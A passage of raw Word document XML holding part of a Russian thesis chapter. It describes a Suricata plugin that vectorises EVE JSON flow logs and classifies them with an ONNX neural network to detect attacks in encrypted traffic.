          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Архитектура плагина</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2869D177" w14:textId="77777777" w:rsidR="005C39E4" w:rsidRDefault="005C39E4" w:rsidP="00F719D5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1585DF91" w14:textId="22290198" w:rsidR="005C39E4" w:rsidRDefault="005C39E4" w:rsidP="005C39E4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C39E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Разработанный программный комплекс включает четыре основных модуля, взаимодействующих в рамках единого конвейера обработки данных. Модуль сбора осуществляет непрерывное чтение файла журнала </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C39E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>eve.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C39E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и передаёт разобранные события в блок векторизации, который формирует числовой вектор из 15 признаков сетевого потока. Полученный вектор поступает на вход MLP-классификатора, реализованного в формате ONNX, который относит каждый поток к классу «норма» или «атака». Взаимодействие компонентов в процессе обработки сетевых событий представлено на рисунке </w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="005C39E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5690C437" w14:textId="0419187B" w:rsidR="008E0171" w:rsidRPr="00BB42B7" w:rsidRDefault="00BB42B7" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>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2329284" wp14:editId="1B4A9998">
            <wp:extent cx="6156325" cy="5257800"/>
            <wp:effectExtent l="19050" t="19050" r="15875" b="19050"/>
            <wp:docPr id="129679647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96471" name="Рисунок 1296796471"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6156325" cy="5257800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC46167" w14:textId="0D6E5449" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>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D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00F450FD" w:rsidRPr="00F450FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Функциональная схема обработки сетевого трафика</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD963B7" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A8BA38C" w14:textId="211E43D7" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="00487796">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27BD7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Входным потоком данных служат логи формата EVE JSON, генерируемые системой обнаружения вторжений </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D27BD7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D27BD7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Результатом работы являются перезаписанные логи и оповещение администратора системы. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4232C877" w14:textId="6B64A370" w:rsidR="00487796" w:rsidRDefault="00487796" w:rsidP="00487796">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487796">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Таким образом, разработанный модуль органично встраивается в существующую инфраструктуру </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00487796">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00487796">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> без изменения её конфигурации. Такой подход обеспечивает совместимость с любой версией </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00487796">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00487796">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и позволяет развернуть модуль на уже работающей системе без её остановки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0E1C2E" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00D27BD7" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A5C0740" w14:textId="051379BB" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="00230C61">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc231673285"/>
      <w:r w:rsidRPr="005135C4">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="007C32B3">
        <w:t>Разработка модели векторизации сетевого трафика для обнаружения аномалий в зашифрованных каналах без расшифровки потока данных</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="778EE35C" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FB53AB5" w14:textId="13384F73" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="28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w:t>
      </w:r>
      <w:r w:rsidRPr="00C27CED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ктуальным направлением </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">является </w:t>
      </w:r>
      <w:r w:rsidRPr="00C27CED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>анализ метаданных зашифрованных соединений. Данный подход позволяет выявлять угрозы на основе статистических характеристик потока, информации о рукопожатии TLS</w:t>
      </w:r>
      <w:r w:rsidR="000C2219">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="000C2219" w:rsidRPr="000C2219">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>протокол безопасности транспортного уровня</w:t>
      </w:r>
      <w:r w:rsidR="000C2219">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C27CED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и поведенческих паттернах, не прибегая к содержимому полезной нагрузки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2699F604" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C27CED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Для реализации данного подхода в рамках разрабатываемого нейросетевого модуля была спроектирована модель векторизации сетевого трафика. Основная задача модели — преобразование разнородных данных логов </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C27CED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C27CED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> в числовой вектор фиксированной размерности, пригодный для подачи на вход нейронной сети.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A84F33" w14:textId="77777777" w:rsidR="00B94753" w:rsidRPr="00B94753" w:rsidRDefault="00B94753" w:rsidP="00B94753">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Анализ структуры логов </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> показал, что даже без расшифровки содержимого пакетов система фиксирует достаточный объём метаданных для построения профиля сетевого соединения. Процесс векторизации включает следующие этапы:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F34898" w14:textId="3643789D" w:rsidR="00B94753" w:rsidRPr="00B94753" w:rsidRDefault="00B94753" w:rsidP="00B94753">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">парсинг событий — чтение JSON-объектов типов </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>flow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> из файла </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>eve.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и фильтрация событий по типу для последующей обработки;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D34CCCD" w14:textId="47CCA23E" w:rsidR="00B94753" w:rsidRPr="00B94753" w:rsidRDefault="00B94753" w:rsidP="00B94753">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>извлечение сырых признаков — получение числовых и категориальных данных из полей логов: количество пакетов, объём переданных байт, порты источника и назначения, протокол, временные метки начала и окончания сессии;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA1CFA7" w14:textId="26C47AFF" w:rsidR="00B94753" w:rsidRPr="00B94753" w:rsidRDefault="00B94753" w:rsidP="00B94753">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вычисление статистик — расчёт производных признаков: количество пакетов в секунду, средний размер пакета, длительность сессии, асимметрия входящего и исходящего трафика;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A82B2F" w14:textId="5DE60743" w:rsidR="00B94753" w:rsidRPr="00B94753" w:rsidRDefault="00B94753" w:rsidP="00B94753">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нормализация — приведение числовых значений к диапазону [0, 1] с использованием параметров нормализатора, сохранённых при обучении модели;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C35B0A" w14:textId="08C8BA74" w:rsidR="00B94753" w:rsidRPr="00B94753" w:rsidRDefault="00B94753" w:rsidP="00B94753">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>кодирование — преобразование категориальных признаков в числовой формат для подачи на вход классификатора.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0510E386" w14:textId="41E3D06F" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F468CE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Модель векторизации реализована в виде программного модуля на языке Python.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C17402">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1D1D1F"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C17402">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Последовательность взаимодействия компонентов, представлен</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="00C17402">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> на рисунке </w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
